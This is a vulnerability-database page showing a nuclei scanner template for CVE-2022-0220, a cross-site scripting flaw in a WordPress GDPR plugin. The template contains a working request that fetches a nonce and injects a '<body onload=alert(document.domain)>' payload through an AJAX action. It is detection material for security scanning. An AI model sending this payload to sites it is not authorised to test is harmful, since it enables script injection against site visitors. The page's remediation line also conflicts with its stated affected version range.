Lucene search
K

WordPress GDPR & CCPA <1.9.27 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

WordPress GDPR & CCPA <1.9.27 - Cross-Site Scripting vulnerability with unauthenticated AJAX actio

Related
Refs
Code
id: CVE-2022-0220

info:
  name: WordPress GDPR & CCPA <1.9.27 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0220
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0220
    cwe-id: CWE-116
    epss-score: 0.0231
    epss-percentile: 0.81303
    cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: welaunch
    product: wordpress_gdpr\&ccpa
    framework: wordpress
  tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch,vuln

http:
  - raw:
      - |
        GET /wp-admin HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - "contains(header_2, 'text/html')"
          - "status_code_2 == 200"
          - "contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
        part: body
# digest: 490a00463044022003c5644a6260a806188c9bcaadb3ec8b603eae8f234e5634b48de37b0ce27f230220618b0d7525c5db2bb64f64d25779d8e79826111483fec01cefadee4f00d067c0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.0231
37